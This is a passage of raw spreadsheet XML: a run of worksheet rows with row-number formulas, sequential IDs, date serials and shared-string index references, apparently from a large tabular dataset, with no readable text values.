    <row r="19234" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19234">
        <f t="shared" si="300"/>
        <v>19233</v>
      </c>
      <c r="B19234">
        <v>4233</v>
      </c>
      <c r="C19234" t="s">
        <v>25497</v>
      </c>
      <c r="D19234" s="1">
        <v>43719</v>
      </c>
      <c r="E19234" t="s">
        <v>30948</v>
      </c>
      <c r="F19234" t="s">
        <v>9975</v>
      </c>
      <c r="G19234" t="s">
        <v>30949</v>
      </c>
    </row>
    <row r="19235" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19235">
        <f t="shared" si="300"/>
        <v>19234</v>
      </c>
      <c r="B19235">
        <v>4234</v>
      </c>
      <c r="C19235" t="s">
        <v>25497</v>
      </c>
      <c r="D19235" s="1">
        <v>43715</v>
      </c>
      <c r="E19235" t="s">
        <v>29857</v>
      </c>
      <c r="F19235" t="s">
        <v>9975</v>
      </c>
      <c r="G19235" t="s">
        <v>30950</v>
      </c>
    </row>
    <row r="19236" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19236">
        <f t="shared" si="300"/>
        <v>19235</v>
      </c>
      <c r="B19236">
        <v>4235</v>
      </c>
      <c r="C19236" t="s">
        <v>25497</v>
      </c>
      <c r="D19236" s="1">
        <v>43734</v>
      </c>
      <c r="E19236" t="s">
        <v>30951</v>
      </c>
      <c r="F19236" t="s">
        <v>9978</v>
      </c>
      <c r="G19236" t="s">
        <v>30952</v>
      </c>
    </row>
    <row r="19237" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19237">
        <f t="shared" si="300"/>
        <v>19236</v>
      </c>
      <c r="B19237">
        <v>4236</v>
      </c>
      <c r="C19237" t="s">
        <v>25497</v>
      </c>
      <c r="D19237" s="1">
        <v>43718</v>
      </c>
      <c r="E19237" t="s">
        <v>25517</v>
      </c>
      <c r="F19237" t="s">
        <v>9975</v>
      </c>
      <c r="G19237" t="s">
        <v>30953</v>
      </c>
    </row>
    <row r="19238" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19238">
        <f t="shared" si="300"/>
        <v>19237</v>
      </c>
      <c r="B19238">
        <v>4237</v>
      </c>
      <c r="C19238" t="s">
        <v>25497</v>
      </c>
      <c r="D19238" s="1">
        <v>43735</v>
      </c>
      <c r="E19238" t="s">
        <v>29126</v>
      </c>
      <c r="F19238" t="s">
        <v>10021</v>
      </c>
      <c r="G19238" t="s">
        <v>30954</v>
      </c>
    </row>
    <row r="19239" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19239">
        <f t="shared" si="300"/>
        <v>19238</v>
      </c>
      <c r="B19239">
        <v>4238</v>
      </c>
      <c r="C19239" t="s">
        <v>25497</v>
      </c>
      <c r="D19239" s="1">
        <v>43710</v>
      </c>
      <c r="F19239" t="s">
        <v>9975</v>
      </c>
      <c r="G19239" t="s">
        <v>30955</v>
      </c>
    </row>
    <row r="19240" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19240">
        <f t="shared" si="300"/>
        <v>19239</v>
      </c>
      <c r="B19240">
        <v>4239</v>
      </c>
      <c r="C19240" t="s">
        <v>25497</v>
      </c>
      <c r="D19240" s="1">
        <v>43712</v>
      </c>
      <c r="F19240" t="s">
        <v>9978</v>
      </c>
      <c r="G19240" t="s">
        <v>30956</v>
      </c>
    </row>
    <row r="19241" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19241">
        <f t="shared" si="300"/>
        <v>19240</v>
      </c>
      <c r="B19241">
        <v>4240</v>
      </c>
      <c r="C19241" t="s">
        <v>25497</v>
      </c>
      <c r="D19241" s="1">
        <v>43714</v>
      </c>
      <c r="E19241" t="s">
        <v>25592</v>
      </c>
      <c r="F19241" t="s">
        <v>9975</v>
      </c>
      <c r="G19241" t="s">
        <v>30957</v>
      </c>
    </row>
    <row r="19242" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19242">
        <f t="shared" si="300"/>
        <v>19241</v>
      </c>
      <c r="B19242">
        <v>4241</v>
      </c>
      <c r="C19242" t="s">
        <v>25497</v>
      </c>
      <c r="D19242" s="1">
        <v>43730</v>
      </c>
      <c r="F19242" t="s">
        <v>9975</v>
      </c>
      <c r="G19242" t="s">
        <v>30958</v>
      </c>
    </row>
    <row r="19243" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19243">
        <f t="shared" si="300"/>
        <v>19242</v>
      </c>
      <c r="B19243">
        <v>4242</v>
      </c>
      <c r="C19243" t="s">
        <v>25497</v>
      </c>
      <c r="D19243" s="1">
        <v>43727</v>
      </c>
      <c r="E19243" t="s">
        <v>25881</v>
      </c>
      <c r="F19243" t="s">
        <v>9975</v>
      </c>
      <c r="G19243" t="s">
        <v>30959</v>
      </c>
    </row>
    <row r="19244" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19244">
        <f t="shared" si="300"/>
        <v>19243</v>
      </c>
      <c r="B19244">
        <v>4243</v>
      </c>
      <c r="C19244" t="s">
        <v>25497</v>
      </c>
      <c r="D19244" s="1">
        <v>43724</v>
      </c>
      <c r="F19244" t="s">
        <v>9975</v>
      </c>
      <c r="G19244" t="s">
        <v>30960</v>
      </c>
    </row>
    <row r="19245" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19245">
        <f t="shared" si="300"/>
        <v>19244</v>
      </c>
      <c r="B19245">
        <v>4244</v>
      </c>
      <c r="C19245" t="s">
        <v>25497</v>
      </c>
      <c r="D19245" s="1">
        <v>43731</v>
      </c>
      <c r="E19245" t="s">
        <v>25517</v>
      </c>
      <c r="F19245" t="s">
        <v>9975</v>
      </c>
      <c r="G19245" t="s">
        <v>30961</v>
      </c>
    </row>
    <row r="19246" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19246">
        <f t="shared" si="300"/>
        <v>19245</v>
      </c>
      <c r="B19246">
        <v>4245</v>
      </c>
      <c r="C19246" t="s">
        <v>25497</v>
      </c>
      <c r="D19246" s="1">
        <v>43725</v>
      </c>
      <c r="E19246" t="s">
        <v>25642</v>
      </c>
      <c r="F19246" t="s">
        <v>9975</v>
      </c>
      <c r="G19246" t="s">
        <v>30962</v>
      </c>
    </row>
    <row r="19247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19247">
        <f t="shared" si="300"/>
        <v>19246</v>
      </c>
      <c r="B19247">
        <v>4246</v>
      </c>
      <c r="C19247" t="s">
        <v>25497</v>
      </c>
      <c r="D19247" s="1">
        <v>43714</v>
      </c>
      <c r="F19247" t="s">
        <v>9975</v>
      </c>
      <c r="G19247" t="s">
        <v>30963</v>
      </c>
    </row>
    <row r="19248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19248">
        <f t="shared" si="300"/>
        <v>19247</v>
      </c>
      <c r="B19248">
        <v>4247</v>
      </c>
      <c r="C19248" t="s">
        <v>25497</v>
      </c>
      <c r="D19248" s="1">
        <v>43712</v>
      </c>
      <c r="E19248" t="s">
        <v>25512</v>
      </c>
      <c r="F19248" t="s">
        <v>9975</v>
      </c>
      <c r="G19248" t="s">
        <v>30964</v>
      </c>
    </row>
    <row r="19249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19249">
        <f t="shared" si="300"/>
        <v>19248</v>
      </c>
      <c r="B19249">
        <v>4248</v>
      </c>
      <c r="C19249" t="s">
        <v>25497</v>
      </c>
      <c r="D19249" s="1">
        <v>43728</v>
      </c>
      <c r="E19249" t="s">
        <v>25512</v>
      </c>
      <c r="F19249" t="s">
        <v>9975</v>
      </c>
      <c r="G19249" t="s">
        <v>30965</v>
      </c>
    </row>
    <row r="19250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19250">
        <f t="shared" si="300"/>
        <v>19249</v>
      </c>
      <c r="B19250">
        <v>4249</v>
      </c>
      <c r="C19250" t="s">
        <v>25497</v>
      </c>
      <c r="D19250" s="1">
        <v>43733</v>
      </c>
      <c r="E19250" t="s">
        <v>30966</v>
      </c>
      <c r="F19250" t="s">
        <v>9975</v>
      </c>
      <c r="G19250" t="s">
        <v>30967</v>
      </c>
    </row>
    <row r="19251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19251">
        <f t="shared" si="300"/>
        <v>19250</v>
      </c>
      <c r="B19251">
        <v>4250</v>
      </c>
      <c r="C19251" t="s">
        <v>25497</v>
      </c>
      <c r="D19251" s="1">
        <v>43729</v>
      </c>
      <c r="E19251" t="s">
        <v>25517</v>
      </c>
      <c r="F19251" t="s">
        <v>9975</v>
      </c>
      <c r="G19251" t="s">
        <v>30968</v>
      </c>
    </row>
    <row r="19252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19252">
        <f t="shared" si="300"/>
        <v>19251</v>
      </c>
      <c r="B19252">
        <v>4251</v>
      </c>
      <c r="C19252" t="s">
        <v>25497</v>
      </c>
      <c r="D19252" s="1">
        <v>43729</v>
      </c>
      <c r="E19252" t="s">
        <v>30969</v>
      </c>
      <c r="F19252" t="s">
        <v>9978</v>
      </c>
      <c r="G19252" t="s">
        <v>30970</v>
      </c>
    </row>
    <row r="19253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19253">
        <f t="shared" si="300"/>
        <v>19252</v>
      </c>
      <c r="B19253">
        <v>4252</v>
      </c>
      <c r="C19253" t="s">
        <v>25497</v>
      </c>
      <c r="D19253" s="1">
        <v>43731</v>
      </c>
      <c r="F19253" t="s">
        <v>9975</v>
      </c>
      <c r="G19253" t="s">
        <v>30971</v>
      </c>
    </row>
    <row r="19254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19254">
        <f t="shared" si="300"/>
        <v>19253</v>
      </c>
      <c r="B19254">
        <v>4253</v>
      </c>
      <c r="C19254" t="s">
        <v>25497</v>
      </c>
      <c r="D19254" s="1">
        <v>43728</v>
      </c>
      <c r="E19254" t="s">
        <v>25517</v>
      </c>
      <c r="F19254" t="s">
        <v>9975</v>
      </c>
      <c r="G19254" t="s">
        <v>30972</v>
      </c>
    </row>
    <row r="19255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19255">
        <f t="shared" si="300"/>
        <v>19254</v>
      </c>
      <c r="B19255">
        <v>4254</v>
      </c>
      <c r="C19255" t="s">
        <v>25497</v>
      </c>
      <c r="D19255" s="1">
        <v>43735</v>
      </c>
      <c r="E19255" t="s">
        <v>30973</v>
      </c>
      <c r="F19255" t="s">
        <v>10021</v>
      </c>
      <c r="G19255" t="s">
        <v>30974</v>
      </c>
    </row>
    <row r="19256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19256">
        <f t="shared" si="300"/>
        <v>19255</v>
      </c>
      <c r="B19256">
        <v>4255</v>
      </c>
      <c r="C19256" t="s">
        <v>25497</v>
      </c>
      <c r="D19256" s="1">
        <v>43712</v>
      </c>
      <c r="E19256" t="s">
        <v>25512</v>
      </c>
      <c r="F19256" t="s">
        <v>9975</v>
      </c>
      <c r="G19256" t="s">
        <v>30975</v>
      </c>
    </row>
    <row r="19257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19257">
        <f t="shared" si="300"/>
        <v>19256</v>
      </c>
      <c r="B19257">
        <v>4256</v>
      </c>
      <c r="C19257" t="s">
        <v>25497</v>
      </c>
      <c r="D19257" s="1">
        <v>43738</v>
      </c>
      <c r="E19257" t="s">
        <v>26178</v>
      </c>
      <c r="F19257" t="s">
        <v>9975</v>
      </c>
      <c r="G19257" t="s">
        <v>30976</v>
      </c>
    </row>
    <row r="19258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19258">
        <f t="shared" si="300"/>
        <v>19257</v>
      </c>
      <c r="B19258">
        <v>4257</v>
      </c>
      <c r="C19258" t="s">
        <v>25497</v>
      </c>
      <c r="D19258" s="1">
        <v>43727</v>
      </c>
      <c r="E19258" t="s">
        <v>25512</v>
      </c>
      <c r="F19258" t="s">
        <v>9975</v>
      </c>
      <c r="G19258" t="s">
        <v>30977</v>
      </c>
    </row>
    <row r="19259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19259">
        <f t="shared" si="300"/>
        <v>19258</v>
      </c>
      <c r="B19259">
        <v>4258</v>
      </c>
      <c r="C19259" t="s">
        <v>25497</v>
      </c>
      <c r="D19259" s="1">
        <v>43732</v>
      </c>
      <c r="E19259" t="s">
        <v>25517</v>
      </c>
      <c r="F19259" t="s">
        <v>9975</v>
      </c>
      <c r="G19259" t="s">
        <v>30978</v>
      </c>
    </row>
    <row r="19260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19260">
        <f t="shared" si="300"/>
        <v>19259</v>
      </c>
      <c r="B19260">
        <v>4259</v>
      </c>
      <c r="C19260" t="s">
        <v>25497</v>
      </c>
      <c r="D19260" s="1">
        <v>43727</v>
      </c>
      <c r="F19260" t="s">
        <v>9975</v>
      </c>
      <c r="G19260" t="s">
        <v>30979</v>
      </c>
    </row>
    <row r="19261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19261">
        <f t="shared" si="300"/>
        <v>19260</v>
      </c>
      <c r="B19261">
        <v>4260</v>
      </c>
      <c r="C19261" t="s">
        <v>25497</v>
      </c>
      <c r="D19261" s="1">
        <v>43735</v>
      </c>
      <c r="E19261" t="s">
        <v>26975</v>
      </c>
      <c r="F19261" t="s">
        <v>9975</v>
      </c>
      <c r="G19261" t="s">
        <v>30980</v>
      </c>
    </row>
    <row r="19262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19262">
        <f t="shared" si="300"/>
        <v>19261</v>
      </c>
      <c r="B19262">
        <v>4261</v>
      </c>
      <c r="C19262" t="s">
        <v>25497</v>
      </c>
      <c r="D19262" s="1">
        <v>43732</v>
      </c>
      <c r="E19262" t="s">
        <v>25517</v>
      </c>
      <c r="F19262" t="s">
        <v>9975</v>
      </c>
      <c r="G19262" t="s">
        <v>30981</v>
      </c>
    </row>
    <row r="19263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19263">
        <f t="shared" si="300"/>
        <v>19262</v>
      </c>
      <c r="B19263">
        <v>4262</v>
      </c>
      <c r="C19263" t="s">
        <v>25497</v>
      </c>
      <c r="D19263" s="1">
        <v>43727</v>
      </c>
      <c r="E19263" t="s">
        <v>30982</v>
      </c>
      <c r="F19263" t="s">
        <v>10021</v>
      </c>
      <c r="G19263" t="s">
        <v>30983</v>
      </c>
    </row>
    <row r="19264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19264">
        <f t="shared" si="300"/>
        <v>19263</v>
      </c>
      <c r="B19264">
        <v>4263</v>
      </c>
      <c r="C19264" t="s">
        <v>25497</v>
      </c>
      <c r="D19264" s="1">
        <v>43710</v>
      </c>
      <c r="E19264" t="s">
        <v>25881</v>
      </c>
      <c r="F19264" t="s">
        <v>9975</v>
      </c>
      <c r="G19264" t="s">
        <v>30984</v>
      </c>
    </row>
    <row r="19265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19265">
        <f t="shared" si="300"/>
        <v>19264</v>
      </c>
      <c r="B19265">
        <v>4264</v>
      </c>
      <c r="C19265" t="s">
        <v>25497</v>
      </c>
      <c r="D19265" s="1">
        <v>43711</v>
      </c>
      <c r="F19265" t="s">
        <v>9975</v>
      </c>
      <c r="G19265" t="s">
        <v>30985</v>
      </c>
    </row>
    <row r="19266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19266">
        <f t="shared" si="300"/>
        <v>19265</v>
      </c>
      <c r="B19266">
        <v>4265</v>
      </c>
      <c r="C19266" t="s">
        <v>25497</v>
      </c>
      <c r="D19266" s="1">
        <v>43728</v>
      </c>
      <c r="E19266" t="s">
        <v>26750</v>
      </c>
      <c r="F19266" t="s">
        <v>9975</v>
      </c>
      <c r="G19266" t="s">
        <v>30986</v>
      </c>
    </row>
    <row r="19267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19267">
        <f t="shared" ref="A19267:A19330" si="301">+ROW(A19266)</f>
        <v>19266</v>
      </c>
      <c r="B19267">
        <v>4266</v>
      </c>
      <c r="C19267" t="s">
        <v>25497</v>
      </c>
      <c r="D19267" s="1">
        <v>43732</v>
      </c>
      <c r="E19267" t="s">
        <v>30987</v>
      </c>
      <c r="F19267" t="s">
        <v>9975</v>
      </c>
      <c r="G19267" t="s">
        <v>30988</v>
      </c>
    </row>
    <row r="19268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19268">
        <f t="shared" si="301"/>
        <v>19267</v>
      </c>
      <c r="B19268">
        <v>4267</v>
      </c>
      <c r="C19268" t="s">
        <v>25497</v>
      </c>
      <c r="D19268" s="1">
        <v>43722</v>
      </c>
      <c r="E19268" t="s">
        <v>25509</v>
      </c>
      <c r="F19268" t="s">
        <v>10021</v>
      </c>
      <c r="G19268" t="s">
        <v>30989</v>
      </c>
    </row>
    <row r="19269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19269">
        <f t="shared" si="301"/>
        <v>19268</v>
      </c>
      <c r="B19269">
        <v>4268</v>
      </c>
      <c r="C19269" t="s">
        <v>25497</v>
      </c>
      <c r="D19269" s="1">
        <v>43733</v>
      </c>
      <c r="E19269" t="s">
        <v>19705</v>
      </c>
      <c r="F19269" t="s">
        <v>9975</v>
      </c>
      <c r="G19269" t="s">
        <v>30990</v>
      </c>
    </row>
    <row r="19270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19270">
        <f t="shared" si="301"/>
        <v>19269</v>
      </c>
      <c r="B19270">
        <v>4269</v>
      </c>
      <c r="C19270" t="s">
        <v>25497</v>
      </c>
      <c r="D19270" s="1">
        <v>43718</v>
      </c>
      <c r="E19270" t="s">
        <v>30991</v>
      </c>
      <c r="F19270" t="s">
        <v>9975</v>
      </c>
      <c r="G19270" t="s">
        <v>30992</v>
      </c>
    </row>
    <row r="19271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19271">
        <f t="shared" si="301"/>
        <v>19270</v>
      </c>
      <c r="B19271">
        <v>4270</v>
      </c>
      <c r="C19271" t="s">
        <v>25497</v>
      </c>
      <c r="D19271" s="1">
        <v>43738</v>
      </c>
      <c r="E19271" t="s">
        <v>25517</v>
      </c>
      <c r="F19271" t="s">
        <v>9975</v>
      </c>
      <c r="G19271" t="s">
        <v>30993</v>
      </c>
    </row>
    <row r="19272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19272">
        <f t="shared" si="301"/>
        <v>19271</v>
      </c>
      <c r="B19272">
        <v>4271</v>
      </c>
      <c r="C19272" t="s">
        <v>25497</v>
      </c>
      <c r="D19272" s="1">
        <v>43731</v>
      </c>
      <c r="E19272" t="s">
        <v>28187</v>
      </c>
      <c r="F19272" t="s">
        <v>10526</v>
      </c>
      <c r="G19272" t="s">
        <v>30994</v>
      </c>
    </row>
    <row r="19273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19273">
        <f t="shared" si="301"/>
        <v>19272</v>
      </c>
      <c r="B19273">
        <v>4272</v>
      </c>
      <c r="C19273" t="s">
        <v>25497</v>
      </c>
      <c r="D19273" s="1">
        <v>43730</v>
      </c>
      <c r="E19273" t="s">
        <v>29399</v>
      </c>
      <c r="F19273" t="s">
        <v>9975</v>
      </c>
      <c r="G19273" t="s">
        <v>30995</v>
      </c>
    </row>
    <row r="19274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19274">
        <f t="shared" si="301"/>
        <v>19273</v>
      </c>
      <c r="B19274">
        <v>4273</v>
      </c>
      <c r="C19274" t="s">
        <v>25497</v>
      </c>
      <c r="D19274" s="1">
        <v>43732</v>
      </c>
      <c r="F19274" t="s">
        <v>9975</v>
      </c>
      <c r="G19274" t="s">
        <v>30996</v>
      </c>
    </row>
    <row r="19275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19275">
        <f t="shared" si="301"/>
        <v>19274</v>
      </c>
      <c r="B19275">
        <v>4274</v>
      </c>
      <c r="C19275" t="s">
        <v>25497</v>
      </c>
      <c r="D19275" s="1">
        <v>43725</v>
      </c>
      <c r="E19275" t="s">
        <v>25572</v>
      </c>
      <c r="F19275" t="s">
        <v>9978</v>
      </c>
      <c r="G19275" t="s">
        <v>30997</v>
      </c>
    </row>
    <row r="19276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19276">
        <f t="shared" si="301"/>
        <v>19275</v>
      </c>
      <c r="B19276">
        <v>4275</v>
      </c>
      <c r="C19276" t="s">
        <v>25497</v>
      </c>
      <c r="D19276" s="1">
        <v>43727</v>
      </c>
      <c r="E19276" t="s">
        <v>30998</v>
      </c>
      <c r="F19276" t="s">
        <v>9975</v>
      </c>
      <c r="G19276" t="s">
        <v>30999</v>
      </c>
    </row>
    <row r="19277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19277">
        <f t="shared" si="301"/>
        <v>19276</v>
      </c>
      <c r="B19277">
        <v>4276</v>
      </c>
      <c r="C19277" t="s">
        <v>25497</v>
      </c>
      <c r="D19277" s="1">
        <v>43730</v>
      </c>
      <c r="E19277" t="s">
        <v>25942</v>
      </c>
      <c r="F19277" t="s">
        <v>9975</v>
      </c>
      <c r="G19277" t="s">
        <v>31000</v>
      </c>
    </row>
    <row r="19278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19278">
        <f t="shared" si="301"/>
        <v>19277</v>
      </c>
      <c r="B19278">
        <v>4277</v>
      </c>
      <c r="C19278" t="s">
        <v>25497</v>
      </c>
      <c r="D19278" s="1">
        <v>43736</v>
      </c>
      <c r="F19278" t="s">
        <v>9975</v>
      </c>
      <c r="G19278" t="s">
        <v>31001</v>
      </c>
    </row>
    <row r="19279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19279">
        <f t="shared" si="301"/>
        <v>19278</v>
      </c>
      <c r="B19279">
        <v>4278</v>
      </c>
      <c r="C19279" t="s">
        <v>25497</v>
      </c>
      <c r="D19279" s="1">
        <v>43716</v>
      </c>
      <c r="E19279" t="s">
        <v>31002</v>
      </c>
      <c r="F19279" t="s">
        <v>9978</v>
      </c>
      <c r="G19279" t="s">
        <v>31003</v>
      </c>
    </row>
    <row r="19280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19280">
        <f t="shared" si="301"/>
        <v>19279</v>
      </c>
      <c r="B19280">
        <v>4279</v>
      </c>
      <c r="C19280" t="s">
        <v>25497</v>
      </c>
      <c r="D19280" s="1">
        <v>43732</v>
      </c>
      <c r="F19280" t="s">
        <v>9975</v>
      </c>
      <c r="G19280" t="s">
        <v>31004</v>
      </c>
    </row>
    <row r="19281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19281">
        <f t="shared" si="301"/>
        <v>19280</v>
      </c>
      <c r="B19281">
        <v>4280</v>
      </c>
      <c r="C19281" t="s">
        <v>25497</v>
      </c>
      <c r="D19281" s="1">
        <v>43718</v>
      </c>
      <c r="E19281" t="s">
        <v>25512</v>
      </c>
      <c r="F19281" t="s">
        <v>9975</v>
      </c>
      <c r="G19281" t="s">
        <v>31005</v>
      </c>
    </row>
    <row r="19282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19282">
        <f t="shared" si="301"/>
        <v>19281</v>
      </c>
      <c r="B19282">
        <v>4281</v>
      </c>
      <c r="C19282" t="s">
        <v>25497</v>
      </c>
      <c r="D19282" s="1">
        <v>43713</v>
      </c>
      <c r="E19282" t="s">
        <v>31006</v>
      </c>
      <c r="F19282" t="s">
        <v>10021</v>
      </c>
      <c r="G19282" t="s">
        <v>31007</v>
      </c>
    </row>
    <row r="19283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19283">
        <f t="shared" si="301"/>
        <v>19282</v>
      </c>
      <c r="B19283">
        <v>4282</v>
      </c>
      <c r="C19283" t="s">
        <v>25497</v>
      </c>
      <c r="D19283" s="1">
        <v>43714</v>
      </c>
      <c r="E19283" t="s">
        <v>31008</v>
      </c>
      <c r="F19283" t="s">
        <v>10526</v>
      </c>
      <c r="G19283" t="s">
        <v>31009</v>
      </c>
    </row>
    <row r="19284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19284">
        <f t="shared" si="301"/>
        <v>19283</v>
      </c>
      <c r="B19284">
        <v>4283</v>
      </c>
      <c r="C19284" t="s">
        <v>25497</v>
      </c>
      <c r="D19284" s="1">
        <v>43728</v>
      </c>
      <c r="E19284" t="s">
        <v>25805</v>
      </c>
      <c r="F19284" t="s">
        <v>9975</v>
      </c>
      <c r="G19284" t="s">
        <v>31010</v>
      </c>
    </row>
    <row r="19285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19285">
        <f t="shared" si="301"/>
        <v>19284</v>
      </c>
      <c r="B19285">
        <v>4284</v>
      </c>
      <c r="C19285" t="s">
        <v>25497</v>
      </c>
      <c r="D19285" s="1">
        <v>43711</v>
      </c>
      <c r="E19285" t="s">
        <v>31011</v>
      </c>
      <c r="F19285" t="s">
        <v>9975</v>
      </c>
      <c r="G19285" t="s">
        <v>31012</v>
      </c>
    </row>
    <row r="19286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19286">
        <f t="shared" si="301"/>
        <v>19285</v>
      </c>
      <c r="B19286">
        <v>4285</v>
      </c>
      <c r="C19286" t="s">
        <v>25497</v>
      </c>
      <c r="D19286" s="1">
        <v>43726</v>
      </c>
      <c r="E19286" t="s">
        <v>31013</v>
      </c>
      <c r="F19286" t="s">
        <v>9975</v>
      </c>
      <c r="G19286" t="s">
        <v>31014</v>
      </c>
    </row>
    <row r="19287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19287">
        <f t="shared" si="301"/>
        <v>19286</v>
      </c>
      <c r="B19287">
        <v>4286</v>
      </c>
      <c r="C19287" t="s">
        <v>25497</v>
      </c>
      <c r="D19287" s="1">
        <v>43729</v>
      </c>
      <c r="E19287" t="s">
        <v>31015</v>
      </c>
      <c r="F19287" t="s">
        <v>9975</v>
      </c>
      <c r="G19287" t="s">
        <v>31016</v>
      </c>
    </row>
    <row r="19288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19288">
        <f t="shared" si="301"/>
        <v>19287</v>
      </c>
      <c r="B19288">
        <v>4287</v>
      </c>
      <c r="C19288" t="s">
        <v>25497</v>
      </c>
      <c r="D19288" s="1">
        <v>43728</v>
      </c>
      <c r="F19288" t="s">
        <v>9975</v>
      </c>
      <c r="G19288" t="s">
        <v>31017</v>
      </c>
    </row>
    <row r="19289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19289">
        <f t="shared" si="301"/>
        <v>19288</v>
      </c>
      <c r="B19289">
        <v>4288</v>
      </c>
      <c r="C19289" t="s">
        <v>25497</v>
      </c>
      <c r="D19289" s="1">
        <v>43733</v>
      </c>
      <c r="E19289" t="s">
        <v>25512</v>
      </c>
      <c r="F19289" t="s">
        <v>9975</v>
      </c>
      <c r="G19289" t="s">
        <v>31018</v>
      </c>
    </row>
    <row r="19290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19290">
        <f t="shared" si="301"/>
        <v>19289</v>
      </c>
      <c r="B19290">
        <v>4289</v>
      </c>
      <c r="C19290" t="s">
        <v>25497</v>
      </c>
      <c r="D19290" s="1">
        <v>43733</v>
      </c>
      <c r="F19290" t="s">
        <v>9975</v>
      </c>
      <c r="G19290" t="s">
        <v>31019</v>
      </c>
    </row>
    <row r="19291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19291">
        <f t="shared" si="301"/>
        <v>19290</v>
      </c>
      <c r="B19291">
        <v>4290</v>
      </c>
      <c r="C19291" t="s">
        <v>25497</v>
      </c>
      <c r="D19291" s="1">
        <v>43721</v>
      </c>
      <c r="E19291" t="s">
        <v>31020</v>
      </c>
      <c r="F19291" t="s">
        <v>9975</v>
      </c>
      <c r="G19291" t="s">
        <v>31021</v>
      </c>
    </row>
    <row r="19292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19292">
        <f t="shared" si="301"/>
        <v>19291</v>
      </c>
      <c r="B19292">
        <v>4291</v>
      </c>
      <c r="C19292" t="s">
        <v>25497</v>
      </c>
      <c r="D19292" s="1">
        <v>43714</v>
      </c>
      <c r="E19292" t="s">
        <v>31022</v>
      </c>
      <c r="F19292" t="s">
        <v>9975</v>
      </c>
      <c r="G19292" t="s">
        <v>31023</v>
      </c>
    </row>
    <row r="19293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19293">
        <f t="shared" si="301"/>
        <v>19292</v>
      </c>
      <c r="B19293">
        <v>4292</v>
      </c>
      <c r="C19293" t="s">
        <v>25497</v>
      </c>
      <c r="D19293" s="1">
        <v>43726</v>
      </c>
      <c r="E19293" t="s">
        <v>27725</v>
      </c>
      <c r="F19293" t="s">
        <v>9975</v>
      </c>
      <c r="G19293" t="s">
        <v>31024</v>
      </c>
    </row>
    <row r="19294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19294">
        <f t="shared" si="301"/>
        <v>19293</v>
      </c>
      <c r="B19294">
        <v>4293</v>
      </c>
      <c r="C19294" t="s">
        <v>25497</v>
      </c>
      <c r="D19294" s="1">
        <v>43720</v>
      </c>
      <c r="E19294" t="s">
        <v>31025</v>
      </c>
      <c r="F19294" t="s">
        <v>9975</v>
      </c>
      <c r="G19294" t="s">
        <v>31026</v>
      </c>
    </row>
    <row r="19295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19295">
        <f t="shared" si="301"/>
        <v>19294</v>
      </c>
      <c r="B19295">
        <v>4294</v>
      </c>
      <c r="C19295" t="s">
        <v>25497</v>
      </c>
      <c r="D19295" s="1">
        <v>43734</v>
      </c>
      <c r="F19295" t="s">
        <v>9978</v>
      </c>
      <c r="G19295" t="s">
        <v>31027</v>
      </c>
    </row>
    <row r="19296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19296">
        <f t="shared" si="301"/>
        <v>19295</v>
      </c>
      <c r="B19296">
        <v>4295</v>
      </c>
      <c r="C19296" t="s">
        <v>25497</v>
      </c>
